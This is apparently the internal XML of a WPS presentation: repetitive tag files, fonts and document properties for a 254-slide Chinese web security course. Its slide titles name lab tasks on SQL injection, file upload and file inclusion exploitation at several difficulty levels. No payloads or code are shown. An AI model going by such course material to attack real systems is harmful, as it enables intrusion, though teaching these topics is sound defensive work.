<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag742.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag748.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag749.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50.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag751.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag752.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag753.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag754.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag755.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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60.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag761.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag765.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag766.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag767.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag768.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag769.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70.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag771.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag772.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag773.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag774.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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
</p:tagLst>
</file>

<file path=ppt/tags/tag777.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag778.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag779.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80.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag781.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag782.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag783.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag784.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UNIT_TABLE_BEAUTIFY" val="smartTable{b8f29552-25f9-4700-8f16-9d50e07d956f}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="607*121"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="81*187*607*121"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag79.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag790.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">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KSO_WM_BEAUTIFY_FLAG" val=""/>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BEAUTIFY_FLAG" val=""/>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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag804.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag805.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag806.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag807.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag808.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag811.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag812.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag813.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag814.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag815.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag816.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag817.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag818.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag819.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20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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UNIT_TABLE_BEAUTIFY" val="smartTable{55d037d9-9611-4af7-b44d-f41fd08399d6}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="806*78"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="67*177*806*78"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{b2345d61-a4c0-4a13-baa1-ddb153be4a98}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="623*309"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="199*191*623*309"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{5067a9ab-05c0-47b3-bcbd-7e266a552c95}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="607*121"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="81*187*607*121"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{932d216e-acef-4efa-a387-92f738690bb0}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="628*199"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="59*312*628*199"/>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60.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag965.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag966.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{55d037d9-9611-4af7-b44d-f41fd08399d6}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="806*78"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="67*177*806*78"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag967.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag968.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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90170" rtlCol="0" anchor="t">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="266700" algn="just">
          <a:lnSpc>
            <a:spcPct val="120000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPts val="500"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="0"/>
          </a:spcAft>
          <a:defRPr sz="2400" kern="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40591</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>4694</Paragraphs>
  <Slides>254</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254</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="278" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Agency FB</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>仿宋</vt:lpstr>
      <vt:lpstr>Segoe UI Semilight</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>LilyUPC</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【任务分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【任务描述】</vt:lpstr>
      <vt:lpstr>【任务实施】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lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【任务描述】</vt:lpstr>
      <vt:lpstr>【任务实施】</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【任务实施一：low级别的SQL注入利用】</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【任务实施二：分析medium、high和impossible级别的SQL注入源代码】</vt:lpstr>
      <vt:lpstr>【任务训练】</vt:lpstr>
      <vt:lpstr>【任务评价】</vt:lpstr>
      <vt:lpstr>【任务评价】</vt:lpstr>
      <vt:lpstr>【任务拓展】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【任务分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【任务描述】</vt:lpstr>
      <vt:lpstr>【任务实施】</vt:lpstr>
      <vt:lpstr>【任务实施一：low级别的文件上传漏洞利用】</vt:lpstr>
      <vt:lpstr>【任务实施一：low级别的文件上传漏洞利用】</vt:lpstr>
      <vt:lpstr>【任务实施一：low级别的文件上传漏洞利用】</vt:lpstr>
      <vt:lpstr>【任务实施一：low级别的文件上传漏洞利用】</vt:lpstr>
      <vt:lpstr>【任务实施一：low级别的文件上传漏洞利用】</vt:lpstr>
      <vt:lpstr>【任务实施一：low级别的文件上传漏洞利用】</vt:lpstr>
      <vt:lpstr>【任务实施一：low级别的文件上传漏洞利用】</vt:lpstr>
      <vt:lpstr>【任务实施一：low级别的文件上传漏洞利用】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lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【任务分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【任务描述】</vt:lpstr>
      <vt:lpstr>【任务实施】</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【任务实施一：low级别的文件包含漏洞利用】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lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【任务分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【任务描述】</vt:lpstr>
      <vt:lpstr>【任务实施】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lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【任务分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【任务描述】</vt:lpstr>
      <vt:lpstr>【任务实施】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lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【任务分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【任务描述】</vt:lpstr>
      <vt:lpstr>【任务实施】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【任务训练】</vt:lpstr>
      <vt:lpstr>【任务评价】</vt:lpstr>
      <vt:lpstr>【任务评价】</vt:lpstr>
      <vt:lpstr>【任务拓展】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lh</cp:lastModifiedBy>
  <cp:revision>859</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-27T04:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-28T11:02:04Z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6586922F84494392B4838E3A4614F628</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.14309</vt:lpwstr>
  </property>
</Properties>
</file>